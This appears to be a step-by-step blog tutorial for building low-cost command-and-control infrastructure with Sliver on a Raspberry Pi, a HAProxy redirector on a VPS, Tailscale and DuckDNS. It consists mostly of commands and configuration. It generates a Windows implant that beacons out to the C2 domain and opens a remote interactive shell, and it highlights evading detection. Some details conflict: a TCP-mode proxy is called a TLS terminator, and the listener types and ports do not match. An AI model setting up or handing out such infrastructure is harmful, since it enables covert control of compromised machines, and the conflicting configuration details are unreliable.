Budget C2 Infrastructure on Raspberry Pi: Step-by-Step Setup in an Evening
Building command-and-control (C2) infrastructure for cybersecurity research is often associated with expensive commercial solutions. This guide walks through implementing a fully functional C2 system on a Raspberry Pi 4 using open-source software. The emphasis is on keeping costs low while preserving essential features: encrypted traffic, dynamic DNS, and stealth against detection. This material is for educational purposes only, within the scope of ethical hacking.
Layout of the Budget C2 System
You'll need the following for the build:
- Raspberry Pi 4 (4 GB RAM) — main implant server
- 32 GB SD card
- VPS with 2 GB RAM (from 4 €/month) for the public endpoint
- Tailscale — for secure tunneling between components
- Sliver v1.7.3 — open-source alternative to Cobalt Strike
- DuckDNS — dynamic DNS service
The system architecture follows this flow: implant → duckdns.org:443 → VPS (HAProxy) → Tailscale → Raspberry Pi (Sliver:31337). This setup hides the Pi's real IP behind a public domain and encrypts traffic at every hop.
Setting Up the Secure Tunnel with Tailscale
Install Tailscale on both the Raspberry Pi and VPS the same way. Run in the terminal:
curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up
After browser-based authentication, the system assigns each node a unique Tailscale IP (e.g., Pi: 100.92.XX.XXX, VPS: 100.106.XXX.XX). Test connectivity between nodes:
ping 100.92.XXX.XXX
Key point: traffic between components is end-to-end encrypted, preventing interception at intermediate nodes. Tailscale automatically handles route updates if IPs change, which is crucial for connection stability.
Deploying Sliver on Raspberry Pi
Download the Sliver binary for ARM64:
cd /tmp
wget https://github.com/BishopFox/sliver/releases/download/v1.7.3/sliver-server_linux_arm64
sudo install -m 755 sliver-server_linux_arm64 /usr/local/bin/sliver-server
Launch the server as a daemon, allowing connections from any interface:
sliver-server daemon --lhost 0.0.0.0 --lport 31338
The implant listener runs on port 31337. For management, use the Sliver console: sliver-server console. Make sure port 31337 is open in the Raspberry Pi firewall.
Configuring HAProxy on the VPS
Install HAProxy on the virtual server:
sudo apt install -y haproxy
Edit the config file /etc/haproxy/haproxy.cfg:
global
log /dev/log local0
maxconn 10000
defaults
mode tcp
timeout connect 5s
timeout client 60s
timeout server 60s
frontend sliver_frontend
bind :443
default_backend sliver_backend
backend sliver_backend
server pi4 100.92.XXX.XXX:31337 check
Restart the service:
sudo systemctl enable haproxy
sudo systemctl start haproxy
HAProxy acts as a TLS terminator, forwarding traffic from port 443 to the internal Raspberry Pi address via Tailscale. Verify it's working: openssl s_client -connect your-domain.duckdns.org:443.
Integrating Dynamic DNS
Register a domain on DuckDNS and point it to the VPS public IP. For automatic IP updates, add an update script to cron. Check domain resolution:
dig your-domain.duckdns.org
This step is vital for connection stability when the VPS external IP changes. DuckDNS ensures the domain always resolves to the current server address.
Generating and Testing the Implant
In the Sliver console, create an HTTP listener:
http --domain your-domain.duckdns.org --lhost 0.0.0.0 --lport 31337
Generate a Windows implant with mTLS authentication:
generate --mtls your-domain.duckdns.org:443 --format exe --os windows --save /tmp/sliver.exe
Transfer the file to a test Windows 10 system (disable defenses for demo purposes). Once the implant runs, a session appears in the Sliver console:
[*] Session c5360843 UNIFORM_DISGUST - 100.106.xxx.xx:48190 (win10) - windows/amd64
Connect to the session:
sessions -i c5360843
shell
Testing confirms connection resilience: sessions survive implant restarts or network changes.
Optimization and Operation
For better reliability, we recommend:
- Set up Sliver to auto-start via systemd
- Add HAProxy log monitoring
- Use separate domains for different listeners
- Regularly renew Let's Encrypt certificates
Key commands for day-to-day management:
# Starting Sliver
sliver-server daemon --lhost 0.0.0.0 --lport 31338
# Viewing active sessions
sessions
# Entering interactive shell
sessions -i <ID>
shell
The system supports implant management via the Tailscale mobile app, giving you access from anywhere in the world.
Key Takeaways
- Dual encryption architecture (TLS + Tailscale) minimizes traffic detection risk
- Monthly costs are limited to the VPS (from 4 €); all other software is open-source
- Raspberry Pi 4 handles up to 50 concurrent sessions comfortably
- DuckDNS integration solves dynamic IP issues at no extra cost
- Sliver fully replaces commercial tools with basic networking knowledge
— Editorial Team
No comments yet.